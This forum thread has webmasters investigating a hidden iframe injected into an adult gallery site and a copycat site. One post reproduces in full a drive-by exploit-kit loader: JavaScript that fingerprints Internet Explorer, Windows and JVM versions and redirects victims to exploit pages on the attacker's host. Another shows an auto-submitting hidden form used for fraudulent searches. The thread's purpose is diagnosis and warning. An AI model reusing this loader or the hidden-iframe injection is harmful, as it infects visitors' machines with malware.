Pichunter - Clever seo ? or ?

[SmokeyTheBear]

go to pichunter.com , notice at the very bottom theres a hidden 0x0 iframe pointing to http://seekmat.com/my.php?iframe=1

pointing to wierd pages like http://colombia.seekmat.com/ is that some sort of seo work or did pichunter get hacked



also is this pichunters site wxw.dougansss.com/tgp/ ( DO NOT VISIT - VIRUS ON PAGE )

all the images are hotlinked from pichunter which isnt so strange but all the ref codes appear to also be pichunters ref codes , nastydollars , tcg bangrbros realitycash and that seems strange to just give all the traffic away to pichunter and make him free money while infecting people with an unknown virus

[Tempest]

I didn't get an iframe on the page that loaded for me.

[Daruma]

nothing for me on mac ;)

[martinsc]

i don't get it...

do people really think that hidden content is still helping them with the SE's?

[Daruma]

extremeeeem
delay


on mac



autocad????????????

[2HousePlague]

State of the Art, yo.

2hp

[borked]

no iframe on my FF on a Mac -
seekmat.com/my.php?iframe=1 is weird though - just random form post actions...
eg:

Code:

<html>
<form name="x" method="post" action="http://invicta.bfind.info/search.php?q=invicta 9937">
<input type="hidden" name="guest" value="1">
</form>
<script>
x.submit();
</script>
</html>

where the action="" changes randomly upon reload...

[borked]

my guess is random searches for a pay per search programme or something.... so every visitor generates a hidden search which earns him .0000001cent or something.

[DarkJedi]

Black SEO doorway pages. Nothing clever about them though.

[Matt 26z]

Just a guess here... Using the PicHunter domain to increase the pagerank of those SE pages, and then doing a redirect once they get picked up?

Whatever the case, don't you have anything better to do than look at the source code of TGP's? lol

[Jakke PNG]

Quote:

Originally Posted by Matt 26z

Whatever the case, don't you have anything better to do than look at the source code of TGP's? lol

It's actually pretty nice to know SOMEONE looks at shady shit. I know I don't have time.

[SmokeyTheBear]

Quote:

Originally Posted by Matt 26z

Just a guess here... Using the PicHunter domain to increase the pagerank of those SE pages, and then doing a redirect once they get picked up?

Whatever the case, don't you have anything better to do than look at the source code of TGP's? lol

someone asked me to check out their tgp because they suspected something in the code causing a skim ofg traffic to cgi-dnsl.com that turns out to be dougansss.com that is just a copy of pichunter including the hidden iframes on both sites . turns out he was right .

[DjSap]

i would hope that the owner is smart enough to fuck with se's, since he has an established site and not a new one...

[rhizome]

dougansss.com is responsible for the TM3 hacks. He also totally fucked up my server forcing me to get a new one.

[the Shemp]

bump....

[vcup]

how do i get on pichunter?

[RRRED]

I don't get it...

[emthree]

SEO IMG Spam?

[fris]

i doubt pichunter is a part of that.

[jacked]

seems pretty sketchie to me...

[free4porn]

does sound strange to me

[polle54]

well

the iframe on wxw.dougansss.com/tgp/ is definately exploits....

this is the exploit code....
wxw.dougansss.com/dar/loading.html
and it explains why I wasn't hit by it when I entered, it's only IE they target...

Code:

<IE:clientCaps ID="oClientCaps" /> 
<script type="text/javascript" language="JavaScript">
 var ExploitNumber=0; 
 var Bug_param="";

 function GetVersion(CLSID)
   {
            if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
               {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
            else
               {return Array(0,0,0,0);}
   }

 function Get_Win_Version(IE_vers)
   {
     if (IE_vers.indexOf('Windows 95') != -1) return "95"
     else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
     else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
     else if (IE_vers.indexOf('Windows 98') != -1) return "98"
     else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
     else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
     else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
   }
 
 var CGI_Script="http://wxw.dougansss.com/dar/";
 if (navigator.appName=="Microsoft Internet Explorer")
   {
     
      var IEversion=navigator.appVersion;
      var IEplatform=navigator.platform;
      if (IEplatform.search("Win32") != -1)
      {
         var WinOS=Get_Win_Version(IEversion);
         FullVersion=clientInformation.appMinorVersion;
         PatchList=FullVersion.split(";");
                
         var JVM_vers  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}"); 
         var IE_vers   = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
         
         var XP_SP2_patched=0;
          
         switch (WinOS)
         {
             case "2K":
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }    
                       else                                // if JVM = 5.0.3810.0 or higher
                       { 
                         if (IE_vers[0]==6)
                         {  ExploitNumber=3; }
                         else
                         {  ExploitNumber=2; }
                       } 
                       
                       break;
             case "2K3":
                       ExploitNumber=3;  
                       break;             
             case "XP":
                                                                
                            if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                            {  ExploitNumber=1;  }    
                            else                                // if JVM = 5.0.3810.0 or higher
                            {
                               for (var i=0; i < PatchList.length; i++)
                               {  
                                  if (PatchList[i]=="SP2")
                                  {  XP_SP2_patched=1; }
                                 
                               }
                               if (XP_SP2_patched==0)
                               {
                                  ExploitNumber=3;  
                               }
                               else
                               {
                                  ExploitNumber=4;   
                               }
                            }
                       break;          
             default:  
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }             
                       else
                       {  ExploitNumber=2;  }            // if JVM = 5.0.3810.0 or higher
                     
                       break;         
         }
         // launching exploit which number is depends on Windows and IE versions
              
         switch (ExploitNumber)
         {
             case  1:
					// 95, NT, ME, 98, 2k, XP
                       Bug_param=Bug_param+"e1/e1.html";
                       break;
             case  2:
					// 95, NT, ME, 98, 2k - if JVM = 5.0.3810.0 or higher
                       Bug_param=Bug_param+"e2/e2.html";
                       break;
             case  3:
					// 2k+IE6, 2K3, XP+SP1 - if JVM = 5.0.3810.0 or higher
                       Bug_param=Bug_param+"e3/e3.html";
                       break; 
             default:
                       break;                   
          }
      }
   }

if (Bug_param != ''){
	window.location=CGI_Script+Bug_param;
}

it's not like they are trying to hide it's a exploit LOL

[polle54]

and another thing

the reason they have all the same ref's and things are because they stole all the gallery links and thumbs.. the easiest way to maintain a CJ site...
I don't think it's illigal since all the content is third party and submitted to all kind of sites...

I highly doubt that pichunter has anything to do with this site.

They probably send 0% to the content and the traffic probably comes from varius hacks and maybe trading in the dark area of this industry

[gotys]

Well am I glad I got this 2 days late Someone appereantly hacked us. You guys need to ICQ me when you find something like this, please!

Thank you for pointing it out at least here though

[SmokeyTheBear]

Quote:

Originally Posted by gotys

Well am I glad I got this 2 days late Someone appereantly hacked us. You guys need to ICQ me when you find something like this, please!

Thank you for pointing it out at least here though

sorry i didnt have any contact info or i would have.. figured gfy word of mouth usually travels fastest

[bp4l-xp]

sorry to bump this one but
we also have been hacked by this motherfucker
he is a russian guy
russian business network (his host) doesn't give a fuck about my ABUSE mail.

be careful, change your passwords and protect your scripts with passwords!